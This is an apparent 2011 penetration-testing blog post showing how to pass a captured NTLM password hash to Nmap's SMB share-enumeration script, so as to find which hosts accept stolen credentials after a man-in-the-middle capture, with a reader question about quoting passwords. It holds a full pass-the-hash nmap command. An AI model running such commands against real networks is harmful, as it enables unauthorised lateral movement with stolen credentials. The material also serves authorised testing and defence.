Friday, October 7, 2011

NMap & Pass-the-Hash

Let's speed up pwning the Enterprise another notch. In this scenario, we've obtained an account hash through a Man-in-the-Middle attack using, say, Easy-Creds. In my prior blog posts I showed how to automate a psexec attack across an entire IP range or list. But if the credentials aren't valid on all the targets it can take time to go through the entire range/list, waiting for the authentication to fail, the module to timeout and the 2 second sleep. There has to be a better way and there is.

Nmap supports the use of password hashes:

nmap -n -sT -p445 --script=smb-enum-shares.nse -script-args=smbuser=USER,smbhash=e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c,smbtype=v1,smbdomain=DOMAIN  -oN SMB-User.txt --open -vv

HINT: To test using the local user password hashes, use "smbdomain=."

For further information:
(Look at smbtype)


  1. I realize this is a very naive question, but how do you specify password that contains spaces? nmap --script=smb-enum-shares --script-args="smbuser=user,smbpass="This is a sentence" <<<< Does not work...

    1. This comment has been removed by the author.


Thanks for adding to the conversation. I'll update your post shortly.